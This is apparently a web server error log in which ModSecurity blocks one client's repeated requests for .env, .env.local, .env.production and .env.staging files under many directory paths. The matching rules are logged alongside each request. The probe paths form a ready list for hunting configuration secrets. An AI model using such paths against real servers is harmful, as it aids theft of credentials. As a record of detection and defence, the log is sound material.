[Fri Dec 05 22:59:01.925620 2025] [:error] [pid 542657] [client 45.148.10.244:39822] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTNVpQ-QLHaKzoOBZr3NXwAAAAc"]
[Fri Dec 05 22:59:01.925809 2025] [:error] [pid 542657] [client 45.148.10.244:39822] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTNVpQ-QLHaKzoOBZr3NXwAAAAc"]
[Fri Dec 05 22:59:03.273020 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aTNVp0r2qd9X944cebQoSwAAAAI"]
[Fri Dec 05 22:59:03.273252 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aTNVp0r2qd9X944cebQoSwAAAAI"]
[Fri Dec 05 22:59:03.273429 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aTNVp0r2qd9X944cebQoSwAAAAI"]
[Fri Dec 05 22:59:03.406591 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aTNVp0r2qd9X944cebQoTAAAAAI"]
[Fri Dec 05 22:59:03.406841 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aTNVp0r2qd9X944cebQoTAAAAAI"]
[Fri Dec 05 22:59:03.407025 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aTNVp0r2qd9X944cebQoTAAAAAI"]
[Fri Dec 05 22:59:03.573380 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aTNVp0r2qd9X944cebQoTQAAAAI"]
[Fri Dec 05 22:59:03.573609 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aTNVp0r2qd9X944cebQoTQAAAAI"]
[Fri Dec 05 22:59:03.573802 2025] [:error] [pid 548123] [client 45.148.10.244:39838] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aTNVp0r2qd9X944cebQoTQAAAAI"]
[Fri Dec 05 22:59:03.808880 2025] [authz_core:error] [pid 548123] [client 45.148.10.244:39838] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Fri Dec 05 22:59:04.059817 2025] [authz_core:error] [pid 548123] [client 45.148.10.244:39838] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Fri Dec 05 22:59:12.471872 2025] [:error] [pid 535951] [client 45.148.10.244:42282] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTNVsNHtcJZozOttqkxFnAAAAAQ"]
[Fri Dec 05 22:59:12.472115 2025] [:error] [pid 535951] [client 45.148.10.244:42282] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTNVsNHtcJZozOttqkxFnAAAAAQ"]
[Fri Dec 05 22:59:12.472328 2025] [:error] [pid 535951] [client 45.148.10.244:42282] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTNVsNHtcJZozOttqkxFnAAAAAQ"]
[Fri Dec 05 22:59:18.856007 2025] [:error] [pid 547549] [client 45.148.10.244:42294] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTNVtmVdBqmrMm6mFLtGtgAAABA"]
[Fri Dec 05 22:59:18.856259 2025] [:error] [pid 547549] [client 45.148.10.244:42294] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTNVtmVdBqmrMm6mFLtGtgAAABA"]
[Fri Dec 05 22:59:18.856442 2025] [:error] [pid 547549] [client 45.148.10.244:42294] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTNVtmVdBqmrMm6mFLtGtgAAABA"]
[Fri Dec 05 22:59:28.811091 2025] [:error] [pid 547554] [client 45.148.10.244:55286] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTNVwCSSP5xxF5ece-pRbQAAABU"]
[Fri Dec 05 22:59:28.811319 2025] [:error] [pid 547554] [client 45.148.10.244:55286] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTNVwCSSP5xxF5ece-pRbQAAABU"]
[Fri Dec 05 22:59:28.811501 2025] [:error] [pid 547554] [client 45.148.10.244:55286] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTNVwCSSP5xxF5ece-pRbQAAABU"]
[Fri Dec 05 22:59:38.082119 2025] [:error] [pid 547546] [client 45.148.10.244:34642] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTNVyjVfWv2hMjcMNlzPAQAAAAw"]
[Fri Dec 05 22:59:38.082385 2025] [:error] [pid 547546] [client 45.148.10.244:34642] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTNVyjVfWv2hMjcMNlzPAQAAAAw"]
[Fri Dec 05 22:59:38.082570 2025] [:error] [pid 547546] [client 45.148.10.244:34642] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.local"] [unique_id "aTNVyjVfWv2hMjcMNlzPAQAAAAw"]
[Fri Dec 05 22:59:46.523360 2025] [:error] [pid 548123] [client 45.148.10.244:48224] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTNV0kr2qd9X944cebQoUAAAAAI"]
[Fri Dec 05 22:59:46.523597 2025] [:error] [pid 548123] [client 45.148.10.244:48224] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTNV0kr2qd9X944cebQoUAAAAAI"]
[Fri Dec 05 22:59:46.523789 2025] [:error] [pid 548123] [client 45.148.10.244:48224] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTNV0kr2qd9X944cebQoUAAAAAI"]
[Fri Dec 05 23:00:01.173275 2025] [:error] [pid 535951] [client 45.148.10.244:49860] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTNV4dHtcJZozOttqkxFnQAAAAQ"]
[Fri Dec 05 23:00:01.173535 2025] [:error] [pid 535951] [client 45.148.10.244:49860] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTNV4dHtcJZozOttqkxFnQAAAAQ"]
[Fri Dec 05 23:00:01.173717 2025] [:error] [pid 535951] [client 45.148.10.244:49860] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.production"] [unique_id "aTNV4dHtcJZozOttqkxFnQAAAAQ"]
[Fri Dec 05 23:00:14.026622 2025] [:error] [pid 547554] [client 45.148.10.244:43180] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aTNV7iSSP5xxF5ece-pRbgAAABU"]
[Fri Dec 05 23:00:14.026871 2025] [:error] [pid 547554] [client 45.148.10.244:43180] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aTNV7iSSP5xxF5ece-pRbgAAABU"]
[Fri Dec 05 23:00:14.027060 2025] [:error] [pid 547554] [client 45.148.10.244:43180] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.env.staging"] [unique_id "aTNV7iSSP5xxF5ece-pRbgAAABU"]
[Fri Dec 05 23:01:03.700292 2025] [:error] [pid 535952] [client 45.148.10.244:39136] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTNWH_ITQDoZdzcYGEbPzgAAAAU"]
[Fri Dec 05 23:01:03.700548 2025] [:error] [pid 535952] [client 45.148.10.244:39136] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTNWH_ITQDoZdzcYGEbPzgAAAAU"]
[Fri Dec 05 23:01:03.700733 2025] [:error] [pid 535952] [client 45.148.10.244:39136] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTNWH_ITQDoZdzcYGEbPzgAAAAU"]
[Fri Dec 05 23:01:08.800112 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTNWJC5p8hwAo-ApwKs-OgAAAAE"]
[Fri Dec 05 23:01:08.800358 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTNWJC5p8hwAo-ApwKs-OgAAAAE"]
[Fri Dec 05 23:01:08.800569 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/awstats/.env"] [unique_id "aTNWJC5p8hwAo-ApwKs-OgAAAAE"]
[Fri Dec 05 23:01:09.066986 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-OwAAAAE"]
[Fri Dec 05 23:01:09.067242 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-OwAAAAE"]
[Fri Dec 05 23:01:09.067442 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/conf/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-OwAAAAE"]
